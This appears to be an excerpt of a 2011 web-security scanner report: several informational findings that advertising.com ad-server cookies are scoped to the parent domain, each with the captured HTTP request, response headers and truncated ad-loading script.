Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=Bc6uB3EBAAAABAAAAEAAgEA; BASE=Rgwq3yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9pF!; ROLL=boAno2Cov1BgAaG!; C2=NXfwN5pqEIxFGJpovUg3sY0NSKMCItdhWhQ3WXoVIoLOGaFCKGehWhQ3gZoVIMa4FaFCEGehWhAmoZoVIwtlGaFCA9qhWhw2kXoVIsijGaFCGenhWhQQvaoVI0kmGaFC3mphWVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAH; GUID=MTMwNDU1NzAwNTsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:56:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894907.743226.93232707XMC
Set-Cookie: C2=YXfwN5pqEIxFGJpovUg3sY0NSKMCItdhWhQ3WXoVIoLOGaFCKGehWhQ3gZoVIMa4FaFCEGehWhAmoZoVIwtlGaFCA9qhWhw2kXoVIsijGaFCGenhWhQQvaoVI0kmGaFC3mphWVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwB; domain=advertising.com; expires=Sat, 04-May-2013 00:56:56 GMT; path=/
Set-Cookie: F1=Bgd9B3kAAAAA6c1CAEAAgEABAAAABAAAAIAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:56:56 GMT; path=/
Set-Cookie: BASE=RgwqwyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+G!; domain=advertising.com; expires=Sat, 04-May-2013 00:56:56 GMT; path=/
Set-Cookie: ROLL=boAno2C+PRAglcG!; domain=advertising.com; expires=Sat, 04-May-2013 00:56:56 GMT; path=/
Set-Cookie: 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 00:56:56 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735228/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000743226/mnum=0000894
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=743227/size=300250/u=2/bnum=97154103/xsxdata=1:93310501/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Frealestate.aol.com%252F%253Ficid%253Dnavbar_realest_main5

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=3YfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIA0rGAHC25lBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIoN5FAHCFBqBwhQTaaAcIE0rGAHCGenBwhwoyaAc1qaBaMrR3U7qFEysGMWkBUAoNX8imZOiGaQsjUAbUa4YNS/B73chOvIuFUAsFRpZrgqxbCrnF8ekGKal0Xw6iaElTCVB0kdhiyq7FEwcGKKtyVw2saoopeQBP7lhiCKYG8KIGfysVbAJqakdj+uBXTjRuGJwHsb0Fbpr5fAhTaExzC1BLRqRPjq/HEqXGW9nDfAIcYQ/1+PCVSrxaZW60askhaBCdPiBwFKvIcuKGAHmOgALjYAcIw5oGAHCxbfBwB; domain=advertising.com; expires=Sat, 04-May-2013 00:58:31 GMT; path=/
F1=Bcj9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAUAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:58:31 GMT; path=/
BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; domain=advertising.com; expires=Sat, 04-May-2013 00:58:31 GMT; path=/
ROLL=boAnt2C+PRAglcGLPJnzdbH8d75VK2BUk5QpnoE!; domain=advertising.com; expires=Sat, 04-May-2013 00:58:31 GMT; path=/
97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=743227/size=300250/u=2/bnum=97154103/xsxdata=1:93310501/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Frealestate.aol.com%252F%253Ficid%253Dnavbar_realest_main5 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://realestate.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=Bof9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAQAA+CA; BASE=RgwqyyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9B!; ROLL=boAnq2C+PRAglcGLPJnzdbH8d75VK2B!; C2=xYfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIA0rGAHC25lBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIoN5FAHCFBqBwhQTaaAcIE0rGAHCGenBwhwoyaAc1qaBaMrR3U7qFEysGMWkBUAoNX8imZOiGaQsjUAbUa4YNS/B73chOvIuFUAsFRpZrgqxbCrnF8ekGKal0Xw6iaElTCVB0kdhiyq7FEwcGKKtyVw2saoopeQBP7lhiCKYG8KIGfysVbAJqakdj+uBXTjRuGJwHsb0Fbpr5fAhTaExzC1BLRqRPjq/HEqXGW9nDfAIcYQ/1+PCVSrxaZW60askhaBCdPiBwFKvIcuKGAHmOgALjYAcIw5oGAH; GUID=MTMwNDU1NzEwNTsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:58:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894905.743227.93310501XMC
Set-Cookie: C2=3YfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIA0rGAHC25lBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIoN5FAHCFBqBwhQTaaAcIE0rGAHCGenBwhwoyaAc1qaBaMrR3U7qFEysGMWkBUAoNX8imZOiGaQsjUAbUa4YNS/B73chOvIuFUAsFRpZrgqxbCrnF8ekGKal0Xw6iaElTCVB0kdhiyq7FEwcGKKtyVw2saoopeQBP7lhiCKYG8KIGfysVbAJqakdj+uBXTjRuGJwHsb0Fbpr5fAhTaExzC1BLRqRPjq/HEqXGW9nDfAIcYQ/1+PCVSrxaZW60askhaBCdPiBwFKvIcuKGAHmOgALjYAcIw5oGAHCxbfBwB; domain=advertising.com; expires=Sat, 04-May-2013 00:58:31 GMT; path=/
Set-Cookie: F1=Bcj9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAUAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:58:31 GMT; path=/
Set-Cookie: BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; domain=advertising.com; expires=Sat, 04-May-2013 00:58:31 GMT; path=/
Set-Cookie: ROLL=boAnt2C+PRAglcGLPJnzdbH8d75VK2BUk5QpnoE!; domain=advertising.com; expires=Sat, 04-May-2013 00:58:31 GMT; path=/
Set-Cookie: 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 00:58:31 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735225/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000743227/mnum=0000894
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=790523/size=300250/u=2/bnum=26673240/xsxdata=1:93310299/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=6XfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCA9qBwhw2kXAcIsijGAHCGenBwhQQvaAcI0kmGAHC3mpBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAc; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
F1=Bof9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAQAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
BASE=RgwqyyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9B!; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
ROLL=boAnq2C+PRAglcGLPJnzdbH8d75VK2B!; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=790523/size=300250/u=2/bnum=26673240/xsxdata=1:93310299/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=BAf9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAMAA+CA; BASE=RgwqxyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHK!; ROLL=boAnr2C+PRAglcGLPJnzdbH!; C2=wXfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCA9qBwhw2kXAcIsijGAHCGenBwhQQvaAcI0kmGAHC3mpBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwB; GUID=MTMwNDU1NzA0MDsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:57:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1002049.790523.93310299XMC
Set-Cookie: C2=6XfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCA9qBwhw2kXAcIsijGAHCGenBwhQQvaAcI0kmGAHC3mpBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAc; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
Set-Cookie: F1=Bof9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAQAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
Set-Cookie: BASE=RgwqyyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9B!; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
Set-Cookie: ROLL=boAnq2C+PRAglcGLPJnzdbH8d75VK2B!; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
Set-Cookie: 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 00:57:30 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1571

document.write('<HTML>');document.write('<HEAD>');document.write('<TITLE> </TITLE>');document.write('</HEAD>');document.write('<BODY>');document.write('<OBJECT classid=\'clsid:D27CDB6E-AE6D-11cf-
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=790523/size=728090/u=2/bnum=35460744/xsxdata=1:93306882/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=6XfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCA9qBwhw2kXAcIsijGAHCGenBwhQQvaAcI0kmGAHC3mpBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAc; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
F1=Bof9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAQAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
BASE=RgwqxyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHK!; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
ROLL=boAnq2C+PRAglcGLPJnzdbHyJN5VK2B!; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=790523/size=728090/u=2/bnum=35460744/xsxdata=1:93306882/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=BAf9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAMAA+CA; BASE=RgwqxyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHK!; ROLL=boAnr2C+PRAglcGLPJnzdbH!; C2=wXfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCA9qBwhw2kXAcIsijGAHCGenBwhQQvaAcI0kmGAHC3mpBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwB; GUID=MTMwNDU1NzA0MDsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:57:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.981190.790523.93306882XMC
Set-Cookie: C2=6XfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCA9qBwhw2kXAcIsijGAHCGenBwhQQvaAcI0kmGAHC3mpBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAc; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
Set-Cookie: F1=Bof9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAQAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
Set-Cookie: BASE=RgwqxyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHK!; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
Set-Cookie: ROLL=boAnq2C+PRAglcGLPJnzdbHyJN5VK2B!; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
Set-Cookie: 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 00:57:30 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1561

document.write('<HTML>');document.write('<HEAD>');document.write('<TITLE> </TITLE>');document.write('</HEAD>');document.write('<BODY>');document.write('<OBJECT classid=\'clsid:D27CDB6E-AE6D-11cf-
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=800563/size=300250/u=2/bnum=84248618/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F%253Ficid%253Dnavbar_huffpo_main5

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=7YfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIA0rGAHC25lBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIoN5FAHCFBqBwhQTaaAcIE0rGAHCGenBwhwoyaAc1qaBaMrR3U7qFEysGMWkBUAoNX8imZOiGgasjUAbUa4YNSPC73cBwtIuFUAsFRpZrgqxbCrnF8ekGKal0Xw6iaElTCVB0kdhiyq7FEwcGKKtyVw2saoopeQBP7lhiCKYG8KIGfysVbAJqakdj+uBXTjRuGJwHsb0Fbpr5fAhTaExzC1BLRqRPjq/HEqXGW9nDfAIcYQ/1+PCVSrxaZW60askhaBCdPiBwFKvIcuKGAHmOgALjYAcIw5oGAHCxbfBwB; domain=advertising.com; expires=Sat, 04-May-2013 00:58:34 GMT; path=/
F1=Bsj9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAYAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:58:34 GMT; path=/
